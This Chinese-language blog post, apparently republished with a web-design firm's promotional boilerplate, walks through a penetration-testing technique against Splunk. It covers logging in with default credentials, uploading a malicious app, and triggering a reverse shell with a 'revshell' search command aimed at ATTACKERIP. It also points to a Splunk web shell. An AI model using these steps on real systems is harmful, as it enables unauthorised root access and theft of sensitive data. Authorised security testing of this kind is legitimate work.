在Splunk上如何安装自定义应用反弹Shell

这篇文章主要介绍了在Splunk上如何安装自定义应用反弹Shell，具有一定借鉴价值，感兴趣的朋友可以参考下，希望大家阅读完这篇文章之后大有收获，下面让小编带着大家一起了解一下。

创新互联长期为上千家客户提供的网站建设服务，团队从业经验10年，关注不同地域、不同群体，并针对不同对象提供差异化的产品和服务；打造开放共赢平台，与合作伙伴共同营造健康的互联网生态环境。为通辽企业提供专业的网站建设、网站设计，通辽网站改版等技术服务。拥有十余年丰富建站经验和众多成功案例,为您定制开发。

前言

每次测试时我都会碰到Splunk。Splunk是一个用于搜索，分析和可视化数据的软件平台。通常，Splunk中都会包含着各种数据，其中一些可能是较为敏感的数据。因此，对于渗透测试人员而言它的价值不言而喻。

想要获得对Splunk的访问权限，可以通过猜密码或重用之前获取到的密码尝试登录。曾经，我有过使用“admin:admin”或“admin:changeme”登录进入管理控制台的情况。

Splunk app

有一个技巧我相信很多人都不知道，就是使用Splunk app来执行python代码。TBG Security团队开发了一款可用于渗透测试的Splunk app。该应用早在2017年就已经推出。尽管如此，我觉得还是很少有人知道这个工具，我觉得它应该受到更多人的关注。

工具的使用非常简单。首先，你只需从Splunk Shells GitHub页面下载其最新版本。

登录Splunk管理控制台后，依次单击“App”栏和“Manage Apps”。

进入Apps面板后，单击“Install app from file”。

单击browse按钮并上传tar.gz文件。

应用成功上传后，必须重启Splunk。重启后登录Splunk，并返回到“Apps”界面。单击permissions，当你看到“Sharing”选项时，单击“All Apps”单选按钮。

安装app后，最后要做的就是获取shell。这里会有一些选项，我选择的是通过Metasploit创建的标准反向shell。

MSF handler（或netcat listener）启动并运行后，键入以下命令触发app：

| revshell SHELLTYPE ATTACKERIP ATTACKERPORT

这将立即执行app，并获取到一个反向shell。

以上测试是在Splunk 7.0上进行的，一切都非常的顺利！Splunk通常以root身份运行，这为攻击者提供了枚举主机其他信息的机会，而不仅仅是局限在数据库范围。

更新：

除了以上方法，你还可以使用Tevora的splunk_pentest_app，更多内容可以参阅他们发布的文章。

再次更新（10/20/2018）：

我发现了一个可用的Splunk web shell：https://github.com/f8al/TA-Shell。

感谢你能够认真阅读完这篇文章，希望小编分享的“在Splunk上如何安装自定义应用反弹Shell”这篇文章对大家有帮助，同时也希望大家多多支持创新互联，关注创新互联行业资讯频道，更多相关知识等着你来学习!